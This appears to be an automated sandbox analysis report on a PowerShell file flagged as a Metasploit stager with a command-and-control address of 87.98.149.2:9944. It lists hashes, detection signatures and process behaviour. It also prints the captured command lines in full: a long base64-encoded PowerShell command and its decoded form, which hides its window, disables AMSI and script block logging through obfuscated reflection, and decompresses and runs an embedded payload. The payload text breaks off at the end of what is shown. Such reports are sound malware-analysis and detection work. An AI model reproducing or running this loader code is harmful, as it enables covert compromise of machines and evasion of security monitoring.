metasploit | a0e25f0023b56e2ba4fdb12892fa55fa91f328b548b66a8f14d0e4e105957bf2

General

Target

Doc.ps1
Size

11KB
MD5

1b79c76903d0db77c6b8056afe67d8e3
SHA1

39baffb17f693bd08cac69c80c8766058bbc2236
SHA256

a0e25f0023b56e2ba4fdb12892fa55fa91f328b548b66a8f14d0e4e105957bf2
SHA512

8754f398c64af28ecf050391a5265b34be4c51f84446c2d8eb601622b77cefcf6ab9162974318083ea07235a1c2b3a575263a32fc46d5c1b181268fb41b3be12
SSDEEP

192:f20Cz1PRfs/FcQGGoYUPthzzP0dL1fyAZLlew8VxYvYLAF42xZaF9F6hdA:fw1QF2GoYUPthf0Pew8VxoDlxZjhdA

Score

10^/10

metasploit backdoor execution trojan

Malware Config

Extracted

Family

metasploit

Version

metasploit_stager

C2

87.98.149.2:9944

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Blocklisted process makes network request 10 IoCs

flow	pid	Process
12	1728	powershell.exe
12	1728	powershell.exe
12	1728	powershell.exe
12	1728	powershell.exe
12	1728	powershell.exe
12	1728	powershell.exe
12	1728	powershell.exe
12	1728	powershell.exe
12	1728	powershell.exe
12	1728	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
652	powershell.exe
1728	powershell.exe
1572	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1572	powershell.exe
1572	powershell.exe
1976	powershell.exe
1976	powershell.exe
652	powershell.exe
652	powershell.exe
1728	powershell.exe
1728	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1572	powershell.exe
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeDebugPrivilege	652	powershell.exe
Token: SeDebugPrivilege	1728	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1572 wrote to memory of 1976	1572	powershell.exe	84
PID 1572 wrote to memory of 1976	1572	powershell.exe	84
PID 1976 wrote to memory of 3928	1976	powershell.exe	85
PID 1976 wrote to memory of 3928	1976	powershell.exe	85
PID 3928 wrote to memory of 652	3928	cmd.exe	86
PID 3928 wrote to memory of 652	3928	cmd.exe	86
PID 652 wrote to memory of 1728	652	powershell.exe	87
PID 652 wrote to memory of 1728	652	powershell.exe	87

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\Doc.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e YwBtAGQAIAAvAEMAIAAtAC0AJQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AbgBvAHAAIAAtAHcAIABoAGkAZABkAGUAbgAgAC0AbgBvAG4AaQAgAC0AYwAgACIAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBuAGkAIAAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAgACQAegBuAFAAOAA9ACgAKAAnACcAUwBjAHIAJwAnACsAJwAnAGkAcAB0ACcAJwArACcAJwB7ADEAfQAnACcAKwAnACcAbABvAGMAawB7ADAAfQBvAGcAZwBpAHsAMgB9ACcAJwArACcAJwBnACcAJwApAC0AZgAnACcATAAnACcALAAnACcAQgAnACcALAAnACcAbgAnACcAKQA7AEkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADMAKQB7ACAAJABiAHQAZgBaAD0AWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACgAKAAnACcAewAxAH0AJwAnACsAJwAnAHsAJwAnACsAJwAnADYAfQAnACcAKwAnACcAcwB0AGUAJwAnACsAJwAnAG0AJwAnACsAJwAnAC4AewAnACcAKwAnACcAMAB9AHsAOQB9AG4AewA5AH0AJwAnACsAJwAnAHsANAB9ACcAJwArACcAJwBlAG0AZQBuACcAJwArACcAJwB0AC4AJwAnACsAJwAnAHsAOAB9AHsAMgB9AHQAewA3ACcAJwArACcAJwB9ACcAJwArACcAJwBtAHsAOQB9AHQAaQAnACcAKwAnACcAewA3AH0AbgAnACcAKwAnACcALgB7ADgAJwAnACsAJwAnAH0AJwAnACsAJwAnAG0AcwAnACcAKwAnACcAaQB7ADMAJwAnACsAJwAnAH0AdABpACcAJwArACcAJwB7ADUAJwAnACsAJwAnAH0AcwAnACcAKQAtAGYAJwAnAE0AJwAnACwAJwAnAFMAJwAnACwAJwAnAHUAJwAnACwAJwAnAFUAJwAnACwAJwAnAGcAJwAnACwAJwAnAGwAJwAnACwAJwAnAHkAJwAnACwAJwAnAG8AJwAnACwAJwAnAEEAJwAnACwAJwAnAGEAJwAnACkAKQA7ACAAaQBmACAAKAAkAGIAdABmAFoAKQAgAHsAIAAkAGIAdABmAFoALgBHAGUAdABGAGkAZQBsAGQAKAAoACgAJwAnACcAJwArACcAJwBhACcAJwArACcAJwBtAHsAJwAnACsAJwAnADQAfQBpAEkAewAwACcAJwArACcAJwB9ACcAJwArACcAJwBpAHsAMgB9AHsAJwAnACsAJwAnADEAJwAnACsAJwAnAH0AJwAnACsAJwAnAGEAaQBsAHsAMwB9AGQAJwAnACkALQBmACcAJwBuACcAJwAsACcAJwBGACcAJwAsACcAJwB0ACcAJwAsACcAJwBlACcAJwAsACcAJwBzACcAJwApACwAJwAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwAnACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAkAHQAcgB1AGUAKQA7ACAAfQA7ACAAJAB6AFcAPQAoACgAJwAnAHsAMQB9AG4AJwAnACsAJwAnAGEAYgBsAGUAewA0AH0AYwB7ADUAfQBpAHsAMAB9AHQAJwAnACsAJwAnAHsAMgB9ACcAJwArACcAJwBsAG8AYwBrAEkAbgAnACcAKwAnACcAewAzAH0AbwBjAGEAdAAnACcAKwAnACcAaQBvAG4ATABvAGcAZwAnACcAKwAnACcAaQBuAGcAJwAnACsAJwAnACcAJwApAC0AZgAnACcAcAAnACcALAAnACcARQAnACcALAAnACcAQgAnACcALAAnACcAdgAnACcALAAnACcAUwAnACcALAAnACcAcgAnACcAKQA7ACAAJAByADgARAA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAoACgAJwAnACcAJwArACcAJwB7ADIAfQB7ADQAfQBzAHQAZQBtAC4AewAzAH0AJwAnACsAJwAnAGEAbgBhAGcAJwAnACsAJwAnAGUAJwAnACsAJwAnAG0AZQBuACcAJwArACcAJwB0AC4AQQB7ADUAfQB0AG8AJwAnACsAJwAnAG0AYQB0AGkAbwBuAC4AewAwAH0AdABpAHsAJwAnACsAJwAnADEAfQBzACcAJwApAC0AZgAnACcAVQAnACcALAAnACcAbAAnACcALAAnACcAUwAnACcALAAnACcATQAnACcALAAnACcAeQAnACcALAAnACcAdQAnACcAKQApADsAIAAkAHEATwBLAD0AJAByADgARAAuAEcAZQB0AEYAaQBlAGwAZAAoACcAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcAJwAsACcAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAJwApADsAIABJAGYAIAAoACQAcQBPAEsAKQAgAHsAIAAkAGsATQBaAD0AJABxAE8ASwAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApADsAIAAkAHkASQB6AGMAbAA9AFsAQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwAuAEQAaQBjAHQAaQBvAG4AYQByAHkAWwBzAHQAcgBpAG4AZwAsAFMAeQBzAHQAZQBtAC4ATwBiAGoAZQBjAHQAXQBdADoAOgBuAGUAdwAoACkAOwAgACQAdAA4AFoAWAA3AD0AKAAoACcAJwBFAG4AJwAnACsAJwAnAGEAewAzAH0AbABlACcAJwArACcAJwB7ADEAJwAnACsAJwAnAH0AYwByAGkAcAB0AEIAJwAnACsAJwAnAGwAbwBjAHsAJwAnACsAJwAnADIAfQB7ADAAfQBvAGcAZwBpAG4AZwAnACcAKQAtAGYAJwAnAEwAJwAnACwAJwAnAFMAJwAnACwAJwAnAGsAJwAnACwAJwAnAGIAJwAnACkAOwAgAEkAZgAoACQAawBNAFoAWwAkAHoAbgBQADgAXQApAHsAIAAkAGsATQBaAFsAJAB6AG4AUAA4AF0AWwAkAHoAVwBdAD0AMAA7ACAAJABrAE0AWgBbACQAegBuAFAAOABdAFsAJAB0ADgAWgBYADcAXQA9ADAAOwAgAH0AIAAkAHkASQB6AGMAbAAuAEEAZABkACgAJAB6AFcALAAwACkAOwAgACQAeQBJAHoAYwBsAC4AQQBkAGQAKAAkAHQAOABaAFgANwAsADAAKQA7ACAAJABrAE0AWgBbACcAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAAnACcAKwAkAHoAbgBQADgAXQA9ACQAeQBJAHoAYwBsADsAIAB9ACAARQBsAHMAZQAgAHsAIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAoACcAJwBTAHkAJwAnACsAJwAnAHMAJwAnACsAJwAnAHQAZQBtAC4AewA1AH0AJwAnACsAJwAnAGEAbgAnACcAKwAnACcAYQB7ADQAfQBlAG0AZQBuAHQALgBBAHsAMwB9ACcAJwArACcAJwB0AG8AbQBhAHQAaQBvACcAJwArACcAJwBuAC4AUwBjAHIAaQBwAHQAewAxAH0AewAwAH0AJwAnACsAJwAnAG8AYwB7ACcAJwArACcAJwAyAH0AJwAnACkALQBmACcAJwBsACcAJwAsACcAJwBCACcAJwAsACcAJwBrACcAJwAsACcAJwB1ACcAJwAsACcAJwBnACcAJwAsACcAJwBNACcAJwApACkALgBHAGUAdABGAGkAZQBsAGQAKAAnACcAcwBpAGcAbgBhAHQAdQByAGUAcwAnACcALAAnACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEMAbwBsAGwAZQBjAHQAaQBvAG4AcwAuAEcAZQBuAGUAcgBpAGMALgBIAGEAcwBoAFMAZQB0AFsAcwB0AHIAaQBuAGcAXQApACkAOwAgAH0AfQA7ACYAKABbAHMAYwByAGkAcAB0AGIAbABvAGMAawBdADoAOgBjAHIAZQBhAHQAZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACwAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAKAAnACcASAA0AHMASQBBAE8AcAAyAGIAVwBjAEMAQQA3AFYAVwBiAFcALwBhAFMAJwAnACsAJwAnAEIARAArAFgAcQBuAC8AdwBhAHEAUQBNAEEAbwBCAFEAMgAnACcAKwAnACcAaQBiAFIAcQBwADAAdABqAEgAQgBMAGkAUwA0AEQAdQBhAHQANgBMAFQAWQBpADcAMQBsAHYAUwBiADIARQBpAEMAOQAvAHYAZQBiAE4AWABaAEkAbABPAFMAdQBkADEATAAzAGkANwAyADcATQA3AE8AegB6AHoAdwB6AHMAOABzAE4AOAB6AGkASgBtAGUAUQBiADAAbwArADMAYgA2AFIAOABEAEYAQwBDAEkAawBrAHUANwBaADMAcgBxAGwAUQBLAHcAOABwAHgAcQAzAFMAcgBSACcAJwArACcAJwB0AEoAbgAnACcAKwAnACcAUwBaADYAcAA2ADMAVQA3AGoAaABCAGgAOAA0AHMATAB7ADEAfQBaAE0AawBtAFAASABEAHYASABhAEoAdQBaAHEAbQBPAEYAcABRAGcAbABPADUASQB2ADAAbABqAFUASwBjADQATgBQAHIAeABYAHsAMQB9AHMAYwBlAG0ASABWAFAAcQB6AGQAawBuAGoAQgBhAEsANQAyAEYANQBIAFgAbwBpAGwAVQA1AFgANQBZAHEAOABYAGUAMABnADQAVgBYAFAAVwBsAEgAQwA1AC8ATwAxAGIAdQBUAEkANwBiAGMAeAByAHgAdQAwAEcAMABWAFEAdQBPAC8AdQBVADQANgBqAG0AVQAxAHEAdQBTAEQAOAByADQAcwBDAGIALwBSAHIATAA1AFQANwB4AGsAagBpAE4AbAA3AHcAMgBJAHUAeQBzAFcAUgB1AHkARgBDADMAeABGAFYAaQA3AHcAMwAzAE0AdwA5AGgAUAB5ADMAQwBYADQAMgAwAFMAegBEAGMASgB5AHkANABsAHIAQgB4AGsANQBEAEwAOABEAHAAJwAnACsAJwAnAEwAWQBVADMAMAAvAHcAVwBsAGEAcgBrAG8AegBZAFgAOAAyAG4ALwA4AGgAegAvAEwARAB2ADIANABZAEoAeABHAHUAbQBZAHoAagBKAEYANAA3AE8ATABrAGoASABrADUAcgBYAGMAUgA4AGkAcgAvAGkANQBSAHkAMABIAEoANABRAEYAcwB3AHIARgBSAEMANwBpADEAZABZAEwAcgBFAE4AcABWAFgAcAB2ADUAaQBSAHIALwBDADIAZwBPADUAWABsAGUAVABIAFMAaQBBADEANABFAG0AbABDAHYARgA4AHsAMQB9AHMAMQArADcARwA4AG8AUABpAGkAVwBYAC8AQgBUAFUASwBBAEMANAAwAEEARAB3AE8ANgBuAGcARwA5AFoAMABDAFkANQAnACcAKwAnACcAUQA4ADQATAB4AEQAawB1AEYARwBPAFcANwBXAEQAdwBWAHgANwBFAEsAYwBtAFUAUAAwAHQASwBWAGUAcgBEADAAWQBqAEgAeQBSADYAbQBwAFoAdABrAGcAeQB2AHoAQgA3AFMAbABVAG4ASgBkAC8AVgBWAGIAagBVAEkAUgAxAEwAYgBKADcAUwBkAFkAbQByAGsAeAA4AGUAZABIAEEAMAA5AEMAWAB3AHAAdABJAHsAMQB9AEkANgBqAGQAdAA0AFMAUgBoAHUANwB4AG0ASwBpAEYAYwB3AFYAWAA0AHAASABIAGgASgBjAFkAWgBIAHIAUgBDADcAQQB2AC8AawBjAHIANgBCACcAJwArACcAJwAvAFQAYQBtAE8ARQBCAGMASQBDAHgAWQA4AFUAegBOAGkAQQBoAC8AMABOAFUAMgBoAFAAbwA0AFUAVAAwAEkAYQBRAHAAZQBRAGIAUQByAFQANQAwADUAQgBFADAAdQBtADYAeQBQAEkANABEAHUATQBBAGUAYQBsAHAAYQBRAEgANwBpAFEAegBuAE4AaQBYADUAdwB1ADUAaQBCAFUAMQBpAGwASwAwADYAbwAwADIARQBDAEMAZQBsAFgASgB3AFkAaABpAHYAeQBxAHAATABDAFgANQBsAHIAcgBoAGMAewAxAH0AWgBiAFAAcgByAGIAMwAxAEIATwBQAEoAVAB5AHcAdAB5ADgAOABnAFQATQAvAEYAQQA5AFoAaQBsAFAATgBoADYARQBGAEEAQwA0AGMAZABiAFkASQA0AGcASwBQAEsAcAAnACcAKwAnACcAUwBsAC8AaABZADIAegBzAGsASwBBADQAdgB2ADQAaQBHAGoAaQBpAEYAdABBAEYATABkAHgAQQBOAFcAQgBFAG8ATwBGAHcAUQBKAFEARQAvAGcAUgBTAFYAbQBvAE8ANQBHAGEAMABwAGoAawBBAGkASwB4AFkAZABpAGcASQBvAEQAWABsAHEAWgBMAHgAQwAnACcAKwAnACcAQQB7ADEAfQBiAEwATAB6AHAAWgAnACcAKwAnACcASgBNAEMAQgA3AFEASwBUAEEAbwB4ACcAJwArACcAJwBIAEwAawBLAGcASABSAHIAegBxAHUAUwBTAGgARQBQAGgARQB7ADEAfQBnAEsAWQB2ADAAUABEADUANABYAEgASABCAEYAVAAzAEEAZQBGAEwAbgBJAHEANQBtADIANQA0AEwANABwAGEAMABuAHUASgBsAEQAawB3AEcAUgBjAEEAQwBoAGsAOABTAFIAaABsAEwAOABvAFgAVwBvAEwAUABLADcAdQBrAEgAYQA3AHcAewAxAH0AdAArAEYANgBGAFkAWABTACsAMgBxADcAbQBEAE4AMgBwADIAewAxAH0AYwB0ADYAcAAnACcAKwAnACcAagBjAG0AUgBpAGsATgB3AHgARABrAHoAVABNAHcARgBGAFAAegBwAHoAVgArAHEAcgB2AFUAWgBPAGMAVwBiAGIAVAA3AHEAcABKAGUAeABjAHUAVgBUAE0AMQBqAGEANgAyAHQAeAB1AGEANgBuAFgASgBSADkAewAxAH0AUwBoAGsAUABRAEkAMwByAFAALwByADQAegBWAFYAKwBMAGcAbgBFAHcAMABiAHsAMQB9AG0ASQBCAHkAYgBjAEoARABlACcAJwArACcAJwBDADgAdwBBAHYAcABvAFoAZQBwAG8AeQBWAFEASgBOAE0AYgBsADUAYQBUAGcAOQBXADkAYwBzAGsATABkAGIAagBXAGwAMgBUAHYAMgBjAGEAdQBUAGUATQBSADIAMQBPAHgATABuADIAVgAnACcAKwAnACcANwBYAGEAcQBNAGQAbgBHAE8AMABXAHQAMwB4ADcAawBhADkANgBsAHQAcQAyAEwAbgAyAE8ANAAxAG0ASgB6AFMASQBvAHEANABjAHUAMgB0AFAAVgA1AGUAOQB0AHAASABOAFAAVABHADMASgA2AGwAQgBqAE0ANABFADcATgBpADIARwArAEsAUgB1ADkAWgBHAFIAbQBkAHEAdQAyAHMAegBPAE4AawBHAHQAdAB1AHIAdAB6AHEAaABCAHUAcwBtADIAewAxAH0AWABXAFQAaAAxAEcAbwAyAEgAZABNAHsAMQB9ACsAKwBUADgALwB2ACsAKwBDAHUANwBVADQAdABnAHEAZABtAGcAUABlAEIAYQBxAHUAcQBNADIASABVAFcAVwB4ADEAVgBWADkATQAzAE8AWQBYAFYAMQAxADEAaAByAEMAMgB1AGoASABaAHoAbAA2AHMAKwAvADUAKwAwAHEAMQAvAGMAdgBzAEUAcgAyAFAAVgBOAGwAUwAxAFEAeQBFADMASQB4AFYAdAAyAC8AWABHAEsAUAA1AGkAdQArAC8AdABvAGEASABzADkAawBOAGwAdAB6AFcAKwAxADcAYwBHAHMAYgBhAHIALwBEAHUAOAAvAFAAQQBoAHEAQwA5AGIAZwA3AHIAcgBtAEsAeQBMAFEAZwAzADgAMwBWAHUAdABGAGIARgBPAFkAQwA5AEMAcgBqAEoAWgAxAGwAMgBCAFgAOQB0AGcAOQBYAHMAMgBwAG0AaQBnAE4AMgBLADYAcQBEAGUARwBwAFAAMQBSADAAMAB5AEMATABZAEgAaAByAFMAYgB1AGIAYgBMADMAOQBpAEwAVwBtADEANgA0ACcAJwArACcAJwBCAEoALwBNADQATgB3AE8AeABqAEYAcgBvAGgAWABZAEgAUQBVAHEAZQBBAHsAMQB9ADMAZwB6AGcAdgBMAFIATgAwAHQAQQAwACcAJwArACcAJwBsAHEAKwAnACcAKwAnACcASABKAFcATgBpAHkAdABrAHAAawAnACcAKwAnACcANwBSAFQAaABaADIAUwBkAGcAMgAvAE4AMwBBAGUAVgBNADMATgBjAEIALwAvAFUAYgB0AHYAUgAyAGEAVgBqAGoAcABzACsANwBtAGoAMQBFACsALwB6AE8ANgBEAGsAYgBFAGcAWQBQADIAdgBPAFMAKwBoAFAAVQBhAHYAewAxAH0AdgBpAG0ARgA1ADgAMQBIAHYASAB5AHQARAB7ADEAfQBWAFIAawBvAGEASQBBAGwAKwBoAHcAUgBUAFYAbwBoAE0AbgBuAGIAeAByAEQARwBJAGkATgBHAFEAWgBIAGgAMAByAG4ARABCAE0AbwBWAFYARABNAHkAOABTAFQAYQBVADAAOQBrAFMALwB5AHIAbwBMADkATQBwAEQAQgB4AE0ATgBkAFcAaABtAEgAcgAzADAAVgA1AEUAZQBCAEMAdgBIAFIAbABZAHMAWABWAHgATQB3AFUAZQBSAHcAVgA2AHQAaAAxAG4AQQB3ADYAcQB5AE8AMQBNAFUANgBFAEQASwBUAG0AbABsAE8AewAxAH0AcgByADkAOQBMAGoAOQBWADQARwBVADEAWABSAHcAUQBRAHEAQgA4AE0AMABNAHcAeQAyAHkARgBLAFMANQBkADgATgBFADcAeABRAE8ARgBUAE0AMQA0AEYANgBEAFQATQA0AGUAUQBWAEYARABpAHIAdQBvAHsAMQB9AGcASQA1AEwAUQA0AHAAbwA5AHgATwAxAHoAcQBnAFEARgBIADEAQQBDAHUAQgBsAHgANgBKAHAANABtAFEAQQB4AFEAUABzAFcAMwBVAG8AbQBMAHoAdgAzADQASgBWAEIASwB4ADcAKwBUAEsAbgBuAHgARABPAEgAagAvAHgAdABWAGoAbQB2AC8AcwBQAHQATAA5AEYARwBxAEcAUwA3AFAAVgBwADgAdQBQAEcAbwA1AHYAKwAzACsASQAwAFEANAB5AEQAbgBRAEIAQwBnACsAUABFACcAJwArACcAJwBkAGUAaABpAEYAUABqAGsAZQBSAFQAYwBkAEEALwBXAFUAKwAnACcAKwAnACcAeABPAHYAOABlAHMATgBQAHIAKwBDADkAbAB6AFcAaAB2AHcARQBGADUANABuAC8ARQBnAHcAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBmACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsAIgA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1976
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /C powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c $znP8=((''Scr''+''ipt''+''{1}''+''lock{0}oggi{2}''+''g'')-f''L'',''B'',''n'');If($PSVersionTable.PSVersion.Major -ge 3){ $btfZ=[Ref].Assembly.GetType(((''{1}''+''{''+''6}''+''ste''+''m''+''.{''+''0}{9}n{9}''+''{4}''+''emen''+''t.''+''{8}{2}t{7''+''}''+''m{9}ti''+''{7}n''+''.{8''+''}''+''ms''+''i{3''+''}ti''+''{5''+''}s'')-f''M'',''S'',''u'',''U'',''g'',''l'',''y'',''o'',''A'',''a'')); if ($btfZ) { $btfZ.GetField(((''''+''a''+''m{''+''4}iI{0''+''}''+''i{2}{''+''1''+''}''+''ail{3}d'')-f''n'',''F'',''t'',''e'',''s''),''NonPublic,Static'').SetValue($null,$true); }; $zW=((''{1}n''+''able{4}c{5}i{0}t''+''{2}''+''lockIn''+''{3}ocat''+''ionLogg''+''ing''+'''')-f''p'',''E'',''B'',''v'',''S'',''r''); $r8D=[Ref].Assembly.GetType(((''''+''{2}{4}stem.{3}''+''anag''+''e''+''men''+''t.A{5}to''+''mation.{0}ti{''+''1}s'')-f''U'',''l'',''S'',''M'',''y'',''u'')); $qOK=$r8D.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); If ($qOK) { $kMZ=$qOK.GetValue($null); $yIzcl=[Collections.Generic.Dictionary[string,System.Object]]::new(); $t8ZX7=((''En''+''a{3}le''+''{1''+''}criptB''+''loc{''+''2}{0}ogging'')-f''L'',''S'',''k'',''b''); If($kMZ[$znP8]){ $kMZ[$znP8][$zW]=0; $kMZ[$znP8][$t8ZX7]=0; } $yIzcl.Add($zW,0); $yIzcl.Add($t8ZX7,0); $kMZ[''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+$znP8]=$yIzcl; } Else { [Ref].Assembly.GetType(((''Sy''+''s''+''tem.{5}''+''an''+''a{4}ement.A{3}''+''tomatio''+''n.Script{1}{0}''+''oc{''+''2}'')-f''l'',''B'',''k'',''u'',''g'',''M'')).GetField(''signatures'',''NonPublic,Static'').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAOp2bWcCA7VWbW/aS''+''BD+Xqn/waqQMAoBQ2''+''ibRqp0tjHBLiS4Duat6LTYi71lvSb2EiC9/vebNXZIlOSud1L3i727M7Ozzzwzs8sN8ziJmeQb0o+3b6R8DFCCIkku7Z3rqlQKw8pxq3SrR''+''tJn''+''SZ6p63U7jhBh84sL{1}ZMkmPHDvHaJuZqmOFpQglO5Iv0ljUKc4NPrxX{1}scemHVPqzdknjBaK52F5HXoilU5X5Yq8Xe0g4VXPWlHC5/O1buTI7bcxrxu0G0VQuO/uU46jmU1quSD8r4sCb/RrL5T7xkjiNl7w2IuysWRuyFC3xFVi7w33Mw9hPy3CX420SzDcJyy4lrBxk5DL8Dp''+''LYU30/wWlarkozYX82n/8hz/LDv24YJxGumYzjJF47OLkjHk5rXcR8ir/i5Ry0HJ4QFswrFRC7i1dYLrENpVXpv5iRr/C2gO5XleTHSiA14EmlCvF8{1}s1+7G8oPiiWX/BTUKAC40ADwO6ngG9Z0CY5''+''Q84LxDkuFGOW7WDwVx7EKcmUP0tKVerD0YjHyR6mpZtkgyvzB7SlUnJd/VVbjUIR1LbJ7SdYmrkx8edHA09CXwptI{1}I6jdt4SRhu7xmKiFcwVX4pHHhJcYZHrRC7Av/kcr6B''+''/TamOEBcICxY8UzNiAh/0NU2hPo4UT0IaQpeQbQrT505BE0um6yPI4DuMAealpaQH7iQznNiX5wu5iBU1ilK06o02ECCelXJwYhivyqpLCX5lrrhc{1}ZbPrrb31BOPJTywty88gTM/FA9ZilPNh6EFAC4cdbYI4gKPKp''+''Sl/hY2zskKA4vv4iGjiiFtAFLdxANWBEoOFwQJQE/gRSVmoO5Ga0pjkAiKxYdigIoDXlqZLxC''+''A{1}bLLzpZ''+''JMCB7QKTAox''+''HLkKgHRrzquSShEPhE{1}gKYv0PD54XHHBFT3AeFLnIq5m254L4pa0nuJlDkwGRcAChk8SRhlL8oXWoLPK7ukHa7w{1}t+F6FYXS+2q7mDN2p2{1}ct6p''+''jcmRikNwxDkzTMwFFPzpzV+qrvUZOcWbbT7qpJexcuVTM1ja62txua6nXJR9{1}ShkPQI3rP/r4zVV+LgnEw0b{1}mIBybcJDe''+''C8wAvpoZepoyVQJNMbl5aTg9W9cskLdbjWl2Tv2cauTeMR21OxLn2V''+''7XaqMdnGO0Wt3x7ka96ltq2Ln2O41mJzSIoq4cu2tPV5e9tpHNPTG3J6lBjM4E7Ni2G+KRu9ZGRmdqu2szONkGtturtzqhBusm2{1}XWTh1Go2HdM{1}++T8/v++Cu7U4tgqdmgPeBaquqM2HUWWx1VV9M3OYXV111hrC2uj